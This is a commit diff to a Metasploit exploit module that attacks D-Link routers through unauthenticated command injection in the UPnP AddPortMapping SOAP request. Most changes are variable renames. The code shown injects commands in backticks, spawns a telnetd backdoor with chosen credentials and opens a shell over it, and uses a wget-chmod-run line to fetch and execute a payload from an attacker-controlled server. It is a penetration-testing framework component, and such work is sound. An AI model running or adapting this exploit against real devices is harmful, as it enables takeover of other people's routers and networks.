some feedback included and some playing

Author: m-1-k-3

modules/exploits/linux/http/dlink_upnp_exec_noauth.rb

@@ -14,6 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	include Msf::Exploit::Remote::HttpServer
 	include Msf::Exploit::EXE
 	include Msf::Exploit::FileDropper
+	include Msf::Auxiliary::CommandShell
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -27,7 +28,8 @@ def initialize(info = {})
 				a blind OS command injection vulnerability, there is no output for the executed
 				command when using the cmd generic payload. A ping command against a controlled
 				system could be used for testing purposes. This module has been tested successfully
-				on DIR-300, DIR-600, DIR-645, DIR-845, DIR-865 and DAP1522.
+				on DIR-300, DIR-600, DIR-645, DIR-845, DIR-865.
+				It looks like that there are some more D-Link devices affected.
 			},
 			'Author'      =>
 				[
@@ -84,7 +86,7 @@ def initialize(info = {})
 	end
 
 
-	def request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
+	def request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
 
 		uri = '/soap.cgi'
 		data_uri = "?service=WANIPConn1"
@@ -96,25 +98,25 @@ def request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
 		if type == "add"
 			vprint_status("#{rhost}:#{rport} - adding portmapping")
 
-			sOAPAction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
+			soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
 
 			data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
-			data_cmd << "<NewPortMappingDescription>#{newPortMappingDescription}</NewPortMappingDescription>"
+			data_cmd << "<NewPortMappingDescription>#{new_portmapping_description}</NewPortMappingDescription>"
 			data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
 			data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
 			data_cmd << "<NewEnabled>1</NewEnabled>"
-			data_cmd << "<NewExternalPort>#{newExternalPort}</NewExternalPort>"
+			data_cmd << "<NewExternalPort>#{new_external_port}</NewExternalPort>"
 			data_cmd << "<NewRemoteHost></NewRemoteHost>"
 			data_cmd << "<NewProtocol>TCP</NewProtocol>"
-			data_cmd << "<NewInternalPort>#{newInternalPort}</NewInternalPort>"
+			data_cmd << "<NewInternalPort>#{new_internal_port}</NewInternalPort>"
 			data_cmd << "</m:AddPortMapping>"
 		else
 			#we should clean it up ... otherwise we are not able to exploit it multiple times
 			vprint_status("#{rhost}:#{rport} - deleting portmapping")
-			sOAPAction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
+			soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
 
 			data_cmd << "<m:DeletePortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
-			data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{newExternalPort}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
+			data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
 			data_cmd << "</m:DeletePortMapping>"
 		end
 
@@ -124,9 +126,12 @@ def request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
 		begin
 			res = send_request_raw({
 				'uri'    => uri << data_uri,
+				#'vars_get' => {
+				#	'service' => 'WANIPConn1'
+				#},
 				'method' => 'POST',
 				'headers' => {
-					'SOAPAction' => sOAPAction,
+					'SOAPAction' => soapaction,
 					'Content-Type' => "text/xml"
 					},
 				'data' => data_cmd
@@ -141,23 +146,23 @@ def request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
 	def exploit
 		downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
 
-		newPortMappingDescription = rand_text_alpha(8)
-		newExternalPort = rand(65535)
-		newInternalPort = rand(65535)
+		new_portmapping_description = rand_text_alpha(8)
+		new_external_port = rand(65535)
+		new_internal_port = rand(65535)
 
 		if target.name =~ /CMD/
 			if not (datastore['CMD'])
 				fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
 			end
 			cmd = payload.encoded
 			type = "add"
-			res = request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
+			res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
 			if (!res or res.code != 200)
 				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 			end
 			print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
 			type = "delete"
-			res = request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
+			res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
 			if (!res or res.code != 200)
 				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 			end
@@ -175,26 +180,25 @@ def exploit
 
 			cmd = "telnetd -p #{telnetport} -l \"/usr/sbin/login\" -u #{user}:#{passw}"
 			type = "add"
-			res = request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
+			res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
 			if (!res or res.code != 200)
 				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 			end
 			type = "delete"
-			res = request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
+			res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
 			if (!res or res.code != 200)
 				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 			end
+
 			begin
-				telnet_sock = nil
-				telnet_sock = TCPSocket.open(rhost,telnetport)
-				if telnet_sock
+				sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+
+				if sock
 					print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...")
 				else
 					print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
 				end
-				telnet_sock.close
 
-				#modules/auxiliary/scanner/telnet/telnet_login.rb
 				print_status "Attempting to start a Telnet session #{rhost}:#{telnetport} with #{user}:#{passw}"
 				auth_info = {
 					:host   => rhost,
@@ -206,15 +210,17 @@ def exploit
 					:active => true
 				}
 				report_auth_info(auth_info)
+				merge_me = {
+					'USERPASS_FILE' => nil,
+					'USER_FILE'     => nil,
+					'PASS_FILE'     => nil,
+					'USERNAME'      => user,
+					'PASSWORD'      => passw
+				}
 				# NOT WORKING
-				#merge_me = {
-				#	'USERPASS_FILE' => nil,
-				#	'USER_FILE'     => nil,
-				#	'PASS_FILE'     => nil,
-				#	'USERNAME'      => user,
-				#	'PASSWORD'      => passw
-				#}
-				#start_session(self, "TELNET #{user}:#{passw} (#{rhost}:#{telnetport})", merge_me, true)
+				conn = Net::SSH::CommandStream.new(sock, '/bin/sh', true)
+				#puts conn.methods.to_s
+				start_session(self, "TELNET #{user}:#{passw} (#{rhost}:#{telnetport})", merge_me, false, conn.lsock)
 			rescue
 				print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
 			end
@@ -269,7 +275,7 @@ def exploit
 
 		cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}; chmod 777 /tmp/#{filename}; /tmp/#{filename}"
 		type = "add"
-		res = request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
+		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
 		if (!res or res.code != 200)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
 		end
@@ -285,7 +291,7 @@ def exploit
 		register_file_for_cleanup("/tmp/#{filename}")
 
 		type = "delete"
-		res = request(cmd,type,newExternalPort,newInternalPort,newPortMappingDescription)
+		res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
 		if (!res or res.code != 200)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
 		end